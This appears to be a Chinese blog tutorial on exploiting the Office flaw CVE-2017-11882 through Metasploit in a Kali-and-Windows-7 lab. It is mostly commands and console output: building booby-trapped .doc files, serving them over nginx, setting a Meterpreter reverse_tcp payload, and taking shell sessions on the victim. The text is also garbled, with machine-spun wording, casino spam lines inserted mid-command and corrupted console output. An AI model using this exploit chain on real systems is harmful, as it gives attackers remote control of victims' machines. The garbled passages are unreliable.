漏洞在 Msf下的利用

 

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office二〇一三、激活工具

  3. win7旗舰版ISO镜像

上述工具已经打包好,下载地址:

链接:  密码:xl91

澳门太陽城集团登录网址 1

 

正蛇时候接受了推送的尾巴预先警告,在网络搜索相关音讯看来相当多大牌已经开辟出生成doc文书档案的剧本和msf的poc,本文记录CVE-2017-11882
漏洞在 Msf下的运用。

0x00 漏洞简单介绍

前年七月二14日,微软表露了5月份的安全补丁更新,当中对比引人关切的其实悄然修复了隐敝17年之久的Office远程代码推行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响当下盛行的全部Office版本。攻击者能够选拔漏洞以当下登陆的用户的地位施行大肆命令。
由于漏洞影响面较广,漏洞揭露后,金睛安全探讨组织持续对漏洞有关攻击事件开始展览关切。5月四日,监察和控制到了已有尾巴POC在网络流传,随即快速对相关样本实行了分析。近些日子该样本全世界仅微软杀毒能够检查测量试验。

  • 漏洞影响版本:
  • 澳门太陽城集团登录网址,Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

0x02 利用进程

  1. 生成doc

    #安装运维nginx
    [root@ihoneysec ~]# yum -y install nginx
    澳门太阳集团城网址,[root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本
    [root@ihoneysec ~]# git clone
    [root@ihoneysec ~]# cd CVE-2017-11882/
    [root@ihoneysec CVE-2017-11882]# ls
    Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测量试验doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o cve.doc
    [*] Done ! output file –> cve.doc
    [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “mshta ” -o cve2.doc
    [*] Done ! output file –> cve2.doc
    [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网址根目录
    [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
    404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

漏洞在 Msf下的利用。  

  1. 测验平常弹出calc.exe总计器

澳门太陽城集团登录网址 2

 

  1. kali msf配置Poc:

    root@kali:~# cd /
    # 将下载好的漏洞模块放在msf任性目录下
    root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
    # 检查ip地址
    root@kali:/mnt/hgfs/kalishare# ifconfig
    eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf
    root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

        =[ metasploit v4.16.6-dev                          ]
    
    • — –=[ 1683 exploits – 964 auxiliary – 297 post ]
    • — –=[ 498 payloads – 40 encoders – 10 nops ]
    • — –=[ Free Metasploit Pro trial: ]
      # 搜索cve_2017_11882 漏洞模块
      msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块
      msf > use exploit/windows/smb/cve_2017_11882
      # 设置payload为反弹tcp
      msf exploit(cve漏洞在 Msf下的利用。_2017_11882) > set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      # 设置本机ip
      msf exploit(cve_2017_11882) > set lhost 172.16.253.76
      lhost => 172.16.253.76
      # 设置uri的不二诀窍,要与第一步生成doc时安顿一致
      msf exploit(cve_2017_11882) > set U昂科拉IPATH abc
      ULANDIPATH => abc
      # 检查当前布署msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882):
      Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
      SRVPORT 8080 yes The local port to listen on.
      SSL false no Negotiate SSL for incoming connections
      SSLCert no Path to a custom SSL certificate (default is randomly generated)
      URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp):
      Name Current Setting Required Description


      漏洞在 Msf下的利用。 EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
      LHOST 172.16.253.76 yes The listen address
      LPORT 4444 yes The listen port

      漏洞在 Msf下的利用。漏洞在 Msf下的利用。…

      # 运转利用后,msf会监听本机8080端口,假如win7机器展开doc触发访谈172.16.253.76:8080/abc就能够获得反弹到4444端口的tcp会话
      msf exploit(cve_2017_11882) > exploit
      [漏洞在 Msf下的利用。] Exploit running as background job 0.
      # 开始监听
      [
      ] Started reverse TCP handler on 172.16.253.76:4444
      msf exploit(cve_2017_11882) > [] Using URL:
      [
      ] Local IP:
      [] Server started.
      [
      ] Place the following DDE in an MS document:
      mshta.exe “”
      msf exploit(cve_2017_11882) > [] 172.16.253.4 cve_2017_11882 – Delivering payload
      [
      ] Sending stage (179267 bytes) to 172.16.253.4 #收到反弹tcp连接
      [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
      [
      ] 172.16.253.4 cve_2017_11882 – Delivering payload
      [] Sending stage (179267 bytes) to 172.16.253.4
      [
      ] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) > sessions
      # 查看已经济建设立的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PC\win7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)
      # 进入id为1的会话
      msf exploit(cve_2017_11882) > sessions -i 1
      [*] Starting interaction with 1…
      # 验证获得反弹连接是还是不是是win7机器ip
      meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection
      Hardware MAC : 00:0c:29:72:2e:7d
      MTU : 1500
      IPv4 Address : 172.16.253.4
      IPv4 Netmask : 255.255.0.0
      IPv6 Address : fe80::c15d:3813:94ec:d6c8
      IPv6 Netmask : ffff:ffff:ffff:ffff::

      ……
      # 步向命令形式meterpreter > shell
      Process 2924 created.
      Channel 1 created.
      Microsoft Windows [�汾 6.1.7601]
      ��Ȩ���� (c) 二零零六 Microsoft Corporation����������Ȩ����
      # 查看当前系统用户、主机名
      C:\Windows\system32>net user
      net user

      \WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:\Windows\system32>

  

 

You may also like...

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图